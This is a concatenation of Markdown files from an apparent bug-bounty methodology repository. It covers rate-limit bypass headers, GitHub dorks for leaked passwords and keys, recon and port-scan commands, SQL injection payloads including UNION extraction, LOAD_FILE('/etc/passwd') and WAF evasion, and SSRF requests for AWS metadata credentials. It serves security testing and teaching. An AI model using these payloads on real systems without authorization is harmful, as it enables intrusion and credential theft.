25 | X-Forwarded-For: IP
26 | ```
27 | ## Adding HTTP Headers to Spoof IP and Evade Detection
28 | - These are Headers I've collected so far to Bypass Rate-Limits.
29 | ```
30 | X-Forwarded: 127.0.0.1
31 | X-Forwarded-By: 127.0.0.1
32 | X-Forwarded-For: 127.0.0.1
33 | X-Forwarded-For-Original: 127.0.0.1
34 | X-Forwarder-For: 127.0.0.1
35 | X-Forward-For: 127.0.0.1
36 | Forwarded-For: 127.0.0.1
37 | Forwarded-For-Ip: 127.0.0.1
38 | X-Custom-IP-Authorization: 127.0.0.1
39 | X-Originating-IP: 127.0.0.1
40 | X-Remote-IP: 127.0.0.1
41 | X-Remote-Addr: 127.0.0.1
42 | ```
43 | 
44 | ## Rate Limit Bypass using Special Characters 
45 | 
46 | - Adding Null Byte ( %00 ) at the end of the Email can sometimes Bypass Rate Limit.
47 | - Try adding a Space Character after a Email. ( Not Encoded )
48 | - Some Common Characters that help bypassing Rate Limit : %0d , %2e , %09 , %20 , %0, %00, %0d%0a, %0a, %0C
49 | - Adding a slash(/) at the end of api endpoint can also Bypass Rate Limit. `domain.com/v1/login` -> `domain.com/v1/login/`
50 | 
51 | 
52 | ## Using IP Rotate Burp Extension
53 | 
54 | - Try changing the user-agent, the cookies... anything that could be able to identify you
55 | - If they are limiting to 10 tries per IP, every 10 tries change the IP inside the header.
56 |   Change other headers
57 | - Burp Suite's Extension IP Rotate works well in many cases. Make sure you have Jython installed along.
58 | 
59 | - Here You'll everything you need - https://github.com/PortSwigger/ip-rotate
60 | 
61 | 
62 | ## You can find some more here - [Check this out](https://medium.com/bugbountywriteup/bypassing-rate-limit-like-a-pro-5f3e40250d3c)
63 | ## You can find more with screenshot https://medium.com/@huzaifa_tahir/methods-to-bypass-rate-limit-5185e6c67ecd
64 | 
65 | # Reference
66 | * https://twitter.com/m4ll0k2/status/1294983599943540738/photo/1
67 | * https://twitter.com/SalahHasoneh1/status/1287366496432332800
68 | * https://twitter.com/SMHTahsin33/status/1295054667613757441 (all in one must check)
69 | 
70 | # Authors:  
71 | * [Keshav Malik](https://www.linkedin.com/in/keshav-malik-22478014a) </br>
72 | * [0xd3vil](https://linkedin.com/in/0xd3vil) </br>
73 | * [Virdoex_hunter](https://twitter.com/Virdoex_hunter)
74 | * [@0xCyberPirate](https://twitter.com/0xCyberPirate)
75 | 


--------------------------------------------------------------------------------
/Recon/Github_Dorking.md:
--------------------------------------------------------------------------------
 1 | # GitHub Recon:
 2 | 
 3 | ## Specific Org search:
 4 | - "Org_name" password
 5 | - "org_name" key
 6 | - "org_name" api
 7 | - "org_name" “filename:vim_settings.xml”
 8 | - "org_name" "Authorization: Bearer"
 9 | - "org_name" "Language: PHP"
10 | 
11 | ## Sensitive Files search:
12 | 
13 | - filename:manifest.xml
14 | - filename:travis.yml
15 | - filename:vim_settings.xml
16 | - filename:database
17 | - filename:secrets.yml password
18 | - filename:.esmtprc password
19 | - filename:passwd path:etc
20 | - filename:dbeaver-data-sources.xml
21 | - path:sites databases password
22 | - filename:config.php dbpasswd
23 | 
24 | ## Specific Language based search:
25 | 
26 | - language:python username
27 | - language:php username
28 | - language:sql username
29 | - language:html password
30 | - language:perl password
31 | - language:shell username
32 | - language:java api
33 | - HOMEBREW_GITHUB_API_TOKEN language:shell
34 | 
35 | ## API keys, Token & Hard-Coded Password search:
36 |  
37 | - SecretKey / Secrect_key / skey
38 | - privatekey / private_key / pkey
39 | - user_secret / userSecret
40 | - admin_passwd / adminpasswd / adminPass etc
41 | - “api keys”
42 | - authorization_bearer:
43 | - oauth
44 | - auth
45 | - authentication
46 | - client_secret
47 | - api_token:
48 | - “api token”
49 | - client_id
50 | - password
51 | - user_password
52 | - user_pass
53 | - passcode
54 | - client_secret
55 | - secret
56 | - password hash
57 | - OTP
58 | - user auth
59 | 
60 | ## Username search:
61 | 
62 | - user:name (user:admin)
63 | - org:name (org:google type:users)
64 | - in:login (<username> in:login)
65 | - in:name (<username> in:name)
66 | - fullname:firstname lastname (fullname:<name> <surname>)
67 | - in:email (data in:email)
68 | 
69 | ## GitHub Dorks for Finding Information using Dates:
70 | 
71 | - created:<2012–04–05
72 | - created:>=2011–06–12
73 | - created:2016–02–07 location:iceland
74 | - created:2011–04–06..2013–01–14 <user> in:username
75 | 
76 | ## Extension based search:
77 | 
78 | - extension:pem private
79 | - extension:ppk private
80 | - extension:sql mysql dump
81 | - extension:sql mysql dump password
82 | - extension:json api.forecast.io
83 | 
84 | ## Automated Tools:
85 | 
86 | 1. [TruffleHog](https://github.com/dxa4481/truffleHog)
87 | 2. [WatchTower](https://radar.nightfall.ai/)
88 | 3. [Dorki](https://dorki.attaxa.com/)
89 | 
90 | ## NOTE :
91 | If you find any API key or credentials or any other sensitive information under test directory then do not report it because that is an intended behaviour.
92 | 
93 | ## Author:
94 | [Mr._fr3qu3n533](https://twitter.com/mr_fr3qu3n533)
95 | 


--------------------------------------------------------------------------------
/Recon/Workflow.md:
--------------------------------------------------------------------------------
 1 | ## Recon workflow
 2 | 
 3 | 1. IP space discovery
 4 | 2. TLDs, Acquisitions, & Relations
 5 | 3. Subdomain Enum
 6 | 4. Fingerpirnting
 7 | 5. Dorking
 8 | 6. Content Discovery
 9 | 7. Parameter Discovery
10 | 
11 | ## ASN Discovery
12 | 
13 | **ASN Discovery of Target:** 
14 | 
15 | [https://bgp.he.net](https://bgp.he.net/) 
16 | 
17 | **ASN using whois:** 
18 | 
19 | `whois -h whois.cymru.com $(dig +short example.com)` 
20 | 
21 | NOTE: Be careful cause sometimes you might get ASN for VPSs like digital ocean etc. Don't work on them.
22 | 
23 | **Using Nmap & ASN for discoverying IP related to the targetted ASN**
24 | 
25 | `nmap --script targets-asn --script-args targets-asn.asn=<ASN Number>`
26 | 
27 | **Gathering Company intel using AMASS**
28 | 
29 | `amass intel -org <Organisation name(not domain)>`
30 | 
31 | **ARIN for ASN:**
32 | 
33 | [`https://whois.arin.net`](https://whois.arin.net/) 
34 | 
35 | **Site: IPINFO for ASN**
36 | 
37 | [`https://ipinfo.io`](https://ipinfo.io/)
38 | 
39 | **Subdomains using ASNs using AMASS:**
40 | 
41 | `amass intel -asn <ASN_number>`
42 | 
43 | ## Discovering Brands
44 | 
45 | -***Looking for acquisition or related orgs to target***
46 | 
47 | - wikipedia
48 | - Crunchbase
49 | 
50 | [Crunchbase: Discover innovative companies and the people behind them](https://www.crunchbase.com)
51 | 
52 | - Owler
53 | 
54 | [](http://owler.com/)
55 | 
56 | - Accquiredby
57 | 
58 | [AcquiredBy | Definitive list of bootstrapped acquisitions](https://acquiredby.co/)
59 | 
60 | - LinkedIn
61 | - ReverseWhois using amass intel module
62 | 
63 |     `amass intel -d [domain.com](http://domain.com) -whois`
64 | 
65 | - BuiltWith
66 | 
67 | [BuiltWith](https://builtwith.com/)
68 | 
69 | - Google dork:
70 | 
71 | `intext:"copyright ©️ org_name"`
72 | 
73 | - Shodan Dork using HTTP favicon hashes
74 | 
75 | `http.favicon.hash:<hash>`
76 | 
77 | **Favicon hash can be found using [favfreak](https://github.com/devanshbatham/FavFreak)**
78 | 
79 | ### Author
80 | [Mr._fr3qu3n533](https://twitter.com/mr_fr3qu3n533)
81 | 


--------------------------------------------------------------------------------
/Recon/subdomain_enumeration.md:
--------------------------------------------------------------------------------
 1 | # Subdomain Enumeration 
 2 | Well, subdomain enumeration is important when you are hunting on wildcard enable scope programs. 
 3 | If you are able to get unique subdomains that other miss then it's a good chance for you to get some bugs
 4 | 
 5 | # General Methodology
 6 | * Passive
 7 | * Active
 8 | * Permutation
 9 | 
10 | ## Passive
11 | In this stage you have to use as much resources as you can to passivly gather subdomains
12 | Now a days it's not that much hard to do with community standard tools that usages API keys
13 | 
14 | ### Tools
15 | 
16 | * Subfinder
17 | * Amass
18 | * Assetfinder
19 | * Findomain
20 | 
21 | ## Active
22 | In this stage you have to perform bruteforcing on your target host to see if the word from your wordlist resolve as valid subdomain or not
23 | 
24 | ### Tools
25 | 
26 | * ShuffleDNS
27 | * Aiodnsbrute
28 | 
29 | ## Permutation
30 | In this stage you have to play around the subdomains. Now do changed with the words and see still it resolve as valid or not
31 | 
32 | ## Portscan
33 | Convert domains into ip address
34 | ```bash
35 | while read l; do ip=$(dig +short $l|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|head -1);echo "[+] '$l' => $ip";echo $ip >> ips.txt;done < domains.txt
36 | 
37 | ```
38 | 
39 | we will use masscan for faster results
40 | 
41 | >masscan -p1-65535 -iL ips.txt --max-rate 1800 -oG output.log
42 | 
43 | or you can use [Naabu](https://github.com/projectdiscovery/naabu), [RustScan](https://github.com/RustScan/RustScan/).
44 | 
45 | ### Tools
46 | 
47 | * AltDNS
48 | * DNSGen + ShuffleDNS
49 | 
50 | ## Reference & Resources
51 | 
52 | https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html
53 | 
54 | https://0xpatrik.com/subdomain-enumeration-2019/
55 | 
56 | https://0xpatrik.com/subdomain-enumeration-smarter/
57 | 
58 | https://rootsploit.com/bug-bounty-recon-faster-port-scan/
59 | 
60 | Theres a lot you can do. For now just mentioning communty standard approaches. Will be updating it regularly depending on the methodology comes out. 
61 | 
62 | ## Framework
63 | An automated framework can be used to automate those whole workflow
64 | 
65 | * [SEF](https://github.com/remonsec/SEF)
66 | ___
67 | ## Author
68 | [Mehedi Hasan Remon](https://twitter.com/remonsec)
69 | [Rishi Choudhary](https://twitter.com/0xRyuk)


--------------------------------------------------------------------------------
/SQLi/SQL_Injection.md:
--------------------------------------------------------------------------------
  1 | # SQL Injection
  2 | Here are some quick methods to detect the SQL Injection vulnerability, though the methods are not limited. There are various tricks and tools.
  3 | 
  4 | # Methods To Find Sqli
  5 | 
  6 | ## 1. Using Burpsuite :
  7 | ```
  8 |   1. Capture the request using burpsuite.
  9 |   2. Send the request to burp scanner.
 10 |   3. Proceed with active scan.
 11 |   4. Once the scan is finished, look for SQL vulnerability that has been detected.
 12 |   5. Manually try SQL injection payloads.
 13 |   6. Use SQLMAP to speed up the process.
 14 | ```
 15 | ## 2. Using waybackurls and other bunch of tools :
 16 | ```
 17 |   1. sublist3r -d target | tee -a domains (you can use other tools like findomain, assetfinder, etc.)
 18 |   2. cat domains | httpx | tee -a alive
 19 |   3. cat alive | waybackurls | tee -a urls
 20 |   4. gf sqli urls >> sqli
 21 |   5. sqlmap -m sqli --dbs --batch
 22 |   6. use tamper scripts
 23 | ```
 24 | * More Details in this source thread [https://twitter.com/El3ctr0Byt3s/status/1302706241240731649](https://twitter.com/El3ctr0Byt3s/status/1302706241240731649)
 25 | 
 26 | ## 3. Using heuristic scan to get hidden parameters :
 27 | ```
 28 |   1. Use subdomain enumeration tools on the domain.
 29 |   2. Gather all urls using hakcrawler, waybackurls, gau for the domain and subdomains.
 30 |   3. You can use the same method described above in 2nd point.
 31 |   4. Use Arjun to scan for the hidden params in the urls. 
 32 |   5. Use --urls flag to include all urls.
 33 |   6. Check the params as https://domain.com?<hiddenparam>=<value>
 34 |   7. Send request to file and process it through sqlmap.
 35 | ```
 36 | ## 4. Error generation with untrusted input or special characters :
 37 | ```
 38 |   1. Submit single quote character ' & look for errors.
 39 |   2. Submit SQL specific query.
 40 |   3. Submit Boolean conditions such as or 1=1 and or 1=0, and looking application's response.
 41 |   4. Submit certain payloads that results in time delay.
 42 | ```
 43 | # Post-Methods
 44 | ## 1. Finding total number of columns with order by or group by or having :
 45 | ```
 46 |   Submit a series of ORDER BY clause such as 
 47 | 	  
 48 |     ' ORDER BY 1 --
 49 | 	  ' ORDER BY 2 --
 50 |     ' ORDER BY 3 --
 51 |     
 52 |     and incrementing specified column index until an error occurs.
 53 | ```
 54 | ## 2. Finding vulnerable columns with union operator :
 55 | ```
 56 |   Submit a series of UNION SELECT payloads.
 57 |   
 58 | 	  ' UNION SELECT NULL --
 59 |     ' UNION SELECT NULL, NULL --
 60 |     ' UNION SELECT NULL, NULL, NULL --
 61 |     
 62 |   (Using NULL maximizes the probability that the payload will succeed. NULL can be converted to every commonly used data type.)
 63 | ```
 64 | * To go for the methods in more detail, go through portswigger site.
 65 |   
 66 |   https://portswigger.net/web-security/sql-injection/union-attacks
 67 | 
 68 | ## 3. Extracting basic information like database(), version(), user(), UUID() with concat() or group_concat()
 69 | 
 70 | ### 1. Database version
 71 | ```
 72 |     Oracle 			  SELECT banner FROM v$version
 73 | 		       		  SELECT version FROM v$instance
 74 |     
 75 |     Microsoft 			  SELECT @@version
 76 |     
 77 |     PostgreSQL 			  SELECT version()
 78 |     
 79 |     MySQL 			  SELECT @@version
 80 | ```
 81 | ### 2. Database contents
 82 | ```
 83 |     Oracle        SELECT * FROM all_tables
 84 | 	          SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
 85 |     
 86 |     Microsoft 	  SELECT * FROM information_schema.tables
 87 |                   SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
 88 |     
 89 |     PostgreSQL 	  SELECT * FROM information_schema.tables
 90 |                   SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
 91 | 
 92 |     MySQL         SELECT * FROM information_schema.tables
 93 |                   SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
 94 | ```
 95 | ### 3. Shows version, user and database name
 96 | ```
 97 |    ' AND 1=2 UNION ALL SELECT concat_ws(0x3a,version(),user(),database())
 98 | ```
 99 | ### 4. Using group_concat() function, used to concat all the rows of the returned results.
100 | ```  
101 |    ' union all select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()–
102 | ```
103 | ## 4. Accessing system files with load_file(). and advance exploitation afterwards :
104 | ```
105 |    ' UNION ALL SELECT LOAD_FILE ('/ etc / passwd')
106 | ```
107 | ## 5. Bypassing WAF :
108 | 
109 | ### 1. Using Null byte before SQL query.
110 | ```
111 |     %00' UNION SELECT password FROM Users WHERE username-'xyz'--
112 | ```
113 | ### 2. Using SQL inline comment sequence.
114 | ```
115 |     '/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/OM/**/Users/**/WHE/**/RE/**/username/**/LIKE/**/'xyz'-- 
116 | ```
117 | ### 3. URL encoding
118 | ```      
119 |       for example :
120 |     / URL encoded to %2f
121 |     * URL encoded to %2a
122 | 
123 |     Can also use double encoding, if single encoding doesn't works. Use hex encoding if the rest doesn't work.
124 | ```
125 | ### 4. Changing Cases (uppercase/lowercase)
126 | * For more step wise detailed methods, go through the link below.
127 | 
128 |   https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF
129 | ### 5. Use SQLMAP tamper scripts. It helps bypass WAF/IDS/IPS.
130 | * 1. Use Atlas. It helps suggesting tamper scripts for SQLMAP.
131 |      
132 |      https://github.com/m4ll0k/Atlas
133 | * 2. JHaddix post on SQLMAP tamper scripts.
134 |      
135 |      https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423
136 |         
137 | ## 6. Time Delays :
138 | ```
139 |       Oracle 	      dbms_pipe.receive_message(('a'),10)
140 |       
141 |       Microsoft 	  WAITFOR DELAY '0:0:10'
142 |       
143 |       PostgreSQL 	  SELECT pg_sleep(10)
144 |       
145 |       MySQL 	      SELECT sleep(10) 
146 | ```      
147 | ## 7. Conditional Delays :
148 | ```
149 |       Oracle 	      SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
150 |       
151 |       Microsoft 	  IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
152 |       
153 |       PostgreSQL 	  SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
154 |       
155 |       MySQL 	      SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a') 
156 | ```      
157 | # Resources and tools that will help gain an upper hand on finding bugs :
158 | * Portswigger SQL Injection cheat sheet - https://portswigger.net/web-security/sql-injection/cheat-sheet
159 | * HTTPX - https://github.com/encode/httpx
160 | * GF patterns - https://github.com/1ndianl33t/Gf-Patterns
161 | * GF (Tomnomnom)- https://github.com/tomnomnom/gf
162 | * We can also use gau with waybackurls to fetch all urls.
163 | * Waybackurls - https://github.com/tomnomnom/waybackurls
164 | * Gau - https://github.com/lc/gau
165 | * Arjun - https://github.com/s0md3v/Arjun
166 | * Hakcrawler - https://github.com/hakluke/hakrawler
167 | 
168 | 
169 | ### Author :
170 | 
171 | * [@xhan1x](https://twitter.com/xhan1x)
172 | 


--------------------------------------------------------------------------------
/SSRF/Blind_SSRF.md:
--------------------------------------------------------------------------------
 1 | # Blind SSRF
 2 | Blind SSRF's are those that don't show enumerated data directly to the user and hence are known as blind SSRF.
 3 | 
 4 | ## Different Methods:
 5 | 
 6 | ### Methodology #1:
 7 | **Header** **Injection**:
 8 | 
 9 | One way of finding them is by inserting your burp collaborator domain into the referrer header also known as host header injection.
10 | 
11 | Snippet:
12 | ```
13 |     GET /HTTP 1.1
14 |     Host: site.tld
15 |     User Agent: Firefox
16 |     Referrer: https://your_collaborator_instance.com
17 | 
18 | ```
19 | 
20 | 
21 |  Many organizations use services that analyse which url or service is referring the visitor to their site. Execution of this type of attack depends upon the underlying service in my case the server was running on an aws ec2 instance but i was unable to get to it's admin panel namely (192.168.192.168) as it was only performing a lookup on me but not allowing anythng beyond that. Try it on different sites and services that you come across you just might get lucky.
22 | 
23 | I will list more as i find if you have found any please kindly list them here so that other's beneift from it.
24 | 
25 | ### Contributor:
26 |  * [@cowlingbanana](https://github.com/cowlingbanana)
27 | 
28 | 


--------------------------------------------------------------------------------
/SSRF/SSRF-old.md:
--------------------------------------------------------------------------------
  1 | # SSRF ( Server-Side-Request-Forgery)
  2 | * What's SSRF ??
  3 |    * SSRF is a type of exploit where an attacker abuses the functionality of a server causing it to access or manipulate information in the realm of that server that would otherwise not be directly accessible to the attacker.
  4 | 
  5 | ## Where to look for ??
  6 | 
  7 | 1. If you got Open Redirect try escalating it to SSRF.
  8 | 
  9 | 2. gf SSRF to grep parameters may vulnerable to SSRF.
 10 | 
 11 | 3. SSRF's are more in API's so crawl the whole web app with burp proxy turned on and search for keywords like., eg :
 12 | ```
 13 | ?url=
 14 | ?uri=
 15 | ?req= 
 16 | etc.....
 17 | ```
 18 | 4. Sign up with an Email like blabla.collaborator.net. If u receive HTTP req. in collaborator then its SSRF. But if there's no impact Don't Report it :) DNS and SMTP req. Doesn't matters.
 19 | 
 20 | ## AWS Metadata
 21 | Most of the sites use AWS nowadays...
 22 | 
 23 | * AWS localhost is 169.254.169.254 so don't use 127.0.0.1 there!
 24 | 
 25 | * If you found an SSRF vulnerability that runs on EC2, try requesting :
 26 | ```
 27 | http://169.254.169.254/latest/meta-data/
 28 | http://169.254.169.254/latest/user-data/
 29 | http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE
 30 | http://169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
 31 | ```
 32 | * Source: https://twitter.com/ADITYASHENDE17/status/1305051512335298562
 33 | 
 34 | ## Escalation
 35 | 
 36 | * SSRF can be Escalated to RCE :) [Impact High] 
 37 | * `<os cmd>`.collaborator.net (thehackerish has a good video in it :)
 38 | * If there's no impact! on your SSRF rather than a redirect try to escalate it to XSS.
 39 | 
 40 | ## Resources 💯
 41 | ### Youtube
 42 | * https://www.youtube.com/watch?v=U0bPPw6uPgY&t=1s
 43 | * https://www.youtube.com/watch?v=324cZic6asE
 44 | * https://www.youtube.com/watch?v=o-tL9ULF0KI
 45 | * https://www.youtube.com/watch?v=324cZic6asE&t=751s
 46 | * https://youtu.be/m4BxIf9PUx0
 47 | * https://youtu.be/apzJiaQ6a3k
 48 | * [A New Era of SSRF](https://www.youtube.com/watch?v=R9pJ2YCXoJQ) by [Orange Tsai](https://blog.orange.tw/)
 49 | 
 50 | ### Hackerone Reports
 51 | * https://hackerone.com/hacktivity?order_field=popular&filter=type%3Apublic&querystring=SSRF
 52 | * https://hackerone.com/reports/737161
 53 | * https://hackerone.com/reports/816848
 54 | * https://hackerone.com/reports/398799
 55 | * https://hackerone.com/reports/382048
 56 | * https://hackerone.com/reports/406387
 57 | * https://hackerone.com/reports/736867
 58 | * https://hackerone.com/reports/517461
 59 | * https://hackerone.com/reports/508459
 60 | * https://hackerone.com/reports/738553
 61 | * https://hackerone.com/reports/514224
 62 | * https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF
 63 | * https://hackerone.com/reports/341876
 64 | * https://hackerone.com/reports/793704
 65 | * https://hackerone.com/reports/386292
 66 | * https://hackerone.com/reports/326040
 67 | * https://hackerone.com/reports/310036
 68 | * https://hackerone.com/reports/643622
 69 | * https://hackerone.com/reports/885975
 70 | * https://hackerone.com/reports/207477
 71 | * https://hackerone.com/reports/514224
 72 | 
 73 | ### Blogs
 74 | * https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978
 75 | * https://medium.com/@kapilvermarbl/ssrf-server-side-request-forgery-5131ffd61c3c
 76 | * https://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326
 77 | * https://medium.com/@chawdamrunal/what-is-server-side-request-forgery-ssrf-7cd0ead0d95f
 78 | * https://medium.com/swlh/ssrf-in-the-wild-e2c598900434
 79 | * https://medium.com/@briskinfosec/ssrf-server-side-request-forgery-ae44ec737cb8
 80 | * https://medium.com/@GAYA3_R/vulnerability-server-side-request-forgery-ssrf-9fe5428184c1
 81 | * https://medium.com/@gupta.bless/exploiting-ssrf-for-admin-access-31c30457cc44
 82 | * https://medium.com/bugbountywriteup/server-side-request-forgery-ssrf-f62235a2c151
 83 | * https://medium.com/@dlpadmavathi.us/ssrf-attack-real-example-a7279256abee
 84 | * https://blog.securityinnovation.com/the-many-faces-of-ssrf
 85 | * https://www.netsparker.com/blog/web-security/server-side-request-forgery-vulnerability-ssrf/
 86 | * http://www.techpna.com/uptzh/blind-ssrf-medium.html
 87 | * https://blog.appsecco.com/finding-ssrf-via-html-injection-inside-a-pdf-file-on-aws-ec2-214cc5ec5d90
 88 | * http://institutopaideia.com.br/journal/blind-ssrf-medium-cfa769
 89 | * https://www.reddit.com/r/bugbounty/comments/cux2zs/ssrf_in_the_wild_the_startup_medium/
 90 | * https://www.sonrn.com.br/blog/5a44cc-blind-ssrf-medium
 91 | * https://ssrf-bypass-medium.thickkare.pw/
 92 | * https://hackerone.com/reports/326040
 93 | * https://www.zerocopter.com/vulnerabilities-price-list-printable
 94 | * https://medium.com/swlh/intro-to-ssrf-beb35857771f
 95 | * https://medium.com/poka-techblog/server-side-request-forgery-ssrf-attacks-part-1-the-basics-a42ba5cc244a
 96 | * https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-3-b0f5997e3739
 97 | * https://medium.com/bugbountywriteup/server-side-request-forgery-ssrf-testing-b9dfe57cca35
 98 | * https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-2-a085ec4332c0
 99 | * https://medium.com/bugbountywriteup/tagged/ssrf
100 | * https://medium.com/seconset/all-about-ssrf-524f41ab96df
101 | * https://blog.cobalt.io/from-ssrf-to-port-scanner-3e8ef5921fbf
102 | * https://portswigger.net/web-security/ssrf
103 | * https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery
104 | 
105 | ### Github Repos
106 | * https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
107 | * https://github.com/jdonsec/AllThingsSSRF
108 | 
109 | ### Author:
110 | * [@0xCyberPirate](https://twitter.com/0xCyberPirate)
111 | * [0xrtt](https://twitter.com/0xrtt)
112 | 


--------------------------------------------------------------------------------
/SSTI/SSTI.md:
--------------------------------------------------------------------------------
 1 | # Some MindMaps
 2 | ---
 3 | ### SSTI Finding Attack Vector by @what_web
 4 | ![https://pbs.twimg.com/media/EnwZh7qXcAEB3wu?format=jpg&name=large](https://pbs.twimg.com/media/EnwZh7qXcAEB3wu?format=jpg&name=large)
 5 | 
 6 | ### Source
 7 | * [https://twitter.com/jae_hak99/status/1331967876417327104?s=20](https://twitter.com/jae_hak99/status/1331967876417327104?s=20)
 8 | 
 9 | ### Tools
10 | + [tplmap](https://github.com/epinna/tplmap)
11 | ### Author
12 | * [0xsunil](https://twitter.com/0xsunil)
13 | 


--------------------------------------------------------------------------------
/SUMMARY.md:
--------------------------------------------------------------------------------
  1 | # Table of contents
  2 | 
  3 | * [HowToHunt.md](README.md)
  4 | 
  5 | ### API Testing
  6 | 
  7 | * [Hidden API Functionality Exposure](./API_Testing/Hidden_API_Functionality_Exposure.md)
  8 | * [Reverse Engineer an API](./API_Testing/Reverse_Engineer_an_API.md)
  9 | 
 10 | ### Account Takeover Methodology
 11 | 
 12 | * [Account Takeover Methodology](./Account_Takeovers_Methodologies/Account_Takeovers_Methods.md)
 13 | 
 14 | ### Application Level DoS
 15 | 
 16 | * [Application Level DoS Methods](/Application_Level_DoS/ALD_Methods.md)
 17 | 
 18 | ### Authentication Bypass
 19 | 
 20 | * [2FA Bypasses](./Authentication_Bypass/2FA_Bypasses.md)
 21 | * [OTP Bypass](./Authentication_Bypass/OTP_Bypass.md)
 22 | * [Account Ban Bypass](Authentication_Bypass/account_ban_bypass.md)
 23 | 
 24 | ### Broken-Link Hijacking
 25 | 
 26 | * [Broken-Link Hijacking](./BrokenLinkHijacking/BrokenLinkHijacking.md)
 27 | 
 28 | ### Broken Auth And Session Management
 29 | 
 30 | * [Session Based Bugs](./Broken_Auth_And_Session_Management/Session_based_bugs.md)
 31 | 
 32 | ### CMS
 33 | 
 34 | * [AEM](./CMS/AEM.md)
 35 | * [Drupal](./CMS/Drupal.md)
 36 | * [Wordpress](./CMS/wordpress.md)
 37 | * [Moodle](./CMS/Moodle.md)
 38 | 
 39 | ### CORS
 40 | 
 41 | * [CORS](./CORS/CORS.md)
 42 | * [CORS Bypasses](./CORS/CORS_Bypasses.md)
 43 | 
 44 | ### CSRF
 45 | 
 46 | * [CSRF](./CSRF/CSRF.md)
 47 | * [CSRF MindMap](./CSRF/README.md)
 48 | * [CSRF Bypass](./CSRF/Cross_Site_Request_Forgery_Bypass.md)
 49 | 
 50 | ### Finding CVEs
 51 | 
 52 | * [CVES](./CVES/easycve.md)
 53 | 
 54 | ### CheckList
 55 | 
 56 | * [Web Application Pentesting Checklist](./CheckList/Web-Application-Pentesting-checklist.md)
 57 | * [Web Checklist by Chintan Gurjar.pdf](https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf)
 58 | * [Web Checklist by Tushra Verma.pdf](https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Application_Penetration_Testing_Checklist_by_Tushar_Verma.pdf)
 59 | * [Mindmap by Rohit Gautam](https://github.com/KathanP19/HowToHunt/blob/master/CheckList/mindmap.png)
 60 | * [Mindmap by Cristian Cornea](https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Penetration_Testing_Methodology%402x.png)
 61 | 
 62 | ### Web Page Source Code Review
 63 | 
 64 | * [Web Page Code Review Tips](./Web_Source_Review/codereviewtips.md)
 65 | 
 66 | ### EXIF Geo Data Not Stripped
 67 | 
 68 | * [EXIF Geo Data Not Stripped](./EXIF_Geo_Data_Not_Stripped/exif_geo.md)
 69 | 
 70 | ### File Upload Bypass
 71 | 
 72 | * [File Upload Bypass](./File_Upload/file_upload.md)
 73 | 
 74 | ### Find Origin IP
 75 | 
 76 | * [Find Origin](./FindOriginIP/FindOrigin.md)
 77 | 
 78 | ### GraphQL
 79 | 
 80 | * [GraphQL](./GraphQL/GraphQL.md)
 81 | 
 82 | ### HTTP Desync Attack
 83 | 
 84 | * [HTTP_Desync](./HTTP_Desync/http_desync.md)
 85 | 
 86 | ### Host-Header Attack
 87 | 
 88 | * [Host-Header](./Host-Header/Host-Header.md)
 89 | 
 90 | ### HTML-Injection
 91 | 
 92 | * [HTML-Injection](./HTML_Injection/HTML_Injection_on_password_reset_page.md)
 93 | 
 94 | ### IDOR
 95 | 
 96 | * [IDOR](./IDOR/IDOR.md)
 97 | 
 98 | ### JWT ATTACK
 99 | 
100 | * [JWT](./JWT/JWT.md)
101 | 
102 | ### JIRA ATTACK
103 | 
104 | * [JIRA](./JIRA/README.md)
105 | 
106 | ### MFA Bypass
107 | 
108 | * [MFA Bypasses](./MFA_Bypasses/README.md)
109 | * [2FA-Bypass](./MFA_Bypasses/2FA_Bypass.md)
110 | 
111 | ### Misconfigurations
112 | 
113 | * [Default Credential And Admin Panel](./Misconfigurations/Default_Credential_and_admin_panel.md)
114 | * [Docker](./Misconfigurations/Docker.md)
115 | * [S3 Bucket](./Misconfigurations/S3-Bucket_Misconfig.md)
116 | 
117 | ### OAuth
118 | 
119 | * [OAuth](./OAuth/README.md)
120 | * [OAuth Hunting](./OAuth/OAuth%202.0%20Hunting%20Methodology.md)
121 | 
122 | ### Open Redirection
123 | 
124 | * [Find OpenRedirect Trick](./Open_Redirection/find_OpenRedirect_trick.md)
125 | * [Open Redirection Bypass](./Open_Redirection/Open_Redirection_Bypass.md)
126 | 
127 | ### Parameter Pollution
128 | 
129 | * [Parameter Pollution In Social Sharing Buttons](./Parameter_Pollution/Parameter_Pollution_in_social_sharing_buttons.md)
130 | 
131 | ### Password Reset Functionality
132 | 
133 | * [MindMap](./Password_Reset_Functionality/README.md)
134 | * [Password Reset Token Leakage](./Password_Reset_Functionality/Password_Reset_Token_Leakage.md)
135 | * [Account_Takeover_By_Password_Reset_Functionality](./Password_Reset_Functionality/Account_Takeover_By_Password_Reset_Functionality.md)
